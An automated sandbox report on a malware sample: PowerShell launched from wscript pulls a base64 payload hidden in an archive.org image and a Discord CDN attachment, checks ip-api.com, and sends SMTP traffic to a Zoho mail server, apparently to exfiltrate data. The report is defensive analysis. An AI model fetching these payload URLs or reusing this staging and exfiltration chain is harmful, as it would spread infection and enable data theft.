                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp

                      Software Vulnerabilities

                      barindex
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 162.159.135.233:443 -> 192.168.2.5:49705
                      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.86:443 -> 192.168.2.5:49704
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTR
                      Source: Yara matchFile source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTR
                      Source: global trafficTCP traffic: 192.168.2.5:49707 -> 185.230.212.164:587
                      Source: global trafficHTTP traffic detected: GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1Host: ia601606.us.archive.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0&is=66ccaa30&hm=d1c475c40c3b46b0e27e96cbd9d311f2634d5d9ee85c92712f601947bf5e518f& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 207.241.227.86 207.241.227.86
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                      Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                      Source: Joe Sandbox ViewASN Name: COMPUTERLINEComputerlineSchlierbachSwitzerlandCH COMPUTERLINEComputerlineSchlierbachSwitzerlandCH
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: ip-api.com
                      Source: global trafficTCP traffic: 192.168.2.5:49707 -> 185.230.212.164:587
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1Host: ia601606.us.archive.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0&is=66ccaa30&hm=d1c475c40c3b46b0e27e96cbd9d311f2634d5d9ee85c92712f601947bf5e518f& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ia601606.us.archive.org
                      Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: smtp.zoho.eu
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE80553000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p
                      Source: powershell.exe, 00000004.00000002.2143156846.000001CEE960F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE81638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia601606.us.archive.org
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.00000000029E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: powershell.exe, 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE819FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.2153683025.000001DCD5291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE80001000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.00000000029E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.zoho.eu
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://status.thawte.com0:
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html0
